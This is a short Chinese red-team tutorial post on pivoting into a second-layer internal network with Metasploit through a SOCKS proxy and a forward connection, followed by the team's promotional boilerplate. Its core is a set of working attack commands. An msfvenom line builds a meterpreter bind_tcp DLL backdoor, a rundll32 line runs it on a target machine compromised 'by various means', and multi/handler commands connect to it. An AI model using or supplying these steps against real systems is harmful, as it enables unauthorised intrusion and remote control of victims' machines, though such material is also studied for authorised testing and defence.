内网深层穿透之metasploit正向连接

来自：5号黯区
5号黯区是一支致力于红队攻防研究与培训的团队，官网：http://www.dark5.net

---

深层内网无法转发出来，所以就用了代理加正向。
多层内网下的穿透，第一层建立反向Socks代理，把MSF代入代理去连接处在第二层的机器。

生成：
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4433 -f dll >/root/meterpreter_bind_tcp_x64_4433.dll

通过各种手法注入到第二层的目标机器：
rundll32.exe meterpreter_bind_tcp_x64_4433.dll Start

连接：

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
show options 
set lport 4433
set rhost 
run

---

5号黯区是一支致力于红队攻防研究与培训的团队，官网：http://www.dark5.net

关于我们

5号黯区是一支致力于红队攻防研究与培训的团队，官网：http://www.dark5.net

加入QQ群

关注公众号